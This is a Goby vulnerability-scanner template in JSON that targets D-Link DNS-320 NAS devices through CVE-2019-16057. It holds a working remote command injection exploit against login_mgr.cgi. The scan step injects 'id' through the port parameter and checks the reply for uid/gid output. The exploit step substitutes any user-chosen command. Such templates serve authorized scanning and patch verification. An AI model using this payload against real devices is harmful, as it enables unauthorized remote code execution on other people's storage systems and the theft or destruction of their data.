Goby/json/D-Link-DNS-320-login_mgr.cg...

95 lines
2.4 KiB
JSON

{
"Name": "D-Link DNS-320 login_mgr.cgi RCE (CVE-2019-16057)",
"Description": "The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection.",
"Product": "D-Link DNS-320",
"Homepage": "http://www.dlink.com.cn/",
"DisclosureDate": "2021-06-02",
"Author": "B1anda0",
"GobyQuery": "body='<link rel=\"STYLESHEET\" type=\"text/css\" href=\"/web/css/button_style.css\">'",
"Level": "3",
"Impact": "<p>The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection.<br></p>",
"Recommendation": "<p>upgrade</p>",
"References": [
"https://nvd.nist.gov/vuln/detail/CVE-2019-16057"
],
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "id"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username=",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "uid=",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "gid=",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"data": "",
"data_type": "text",
"follow_redirect": false,
"method": "GET",
"uri": "/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26{{{cmd}}}&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username="
},
"SetVariable": [
"output|lastbody"
]
}
],
"Tags": [
"RCE"
],
"CVEIDs": ["CVE-2019-16057"],
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}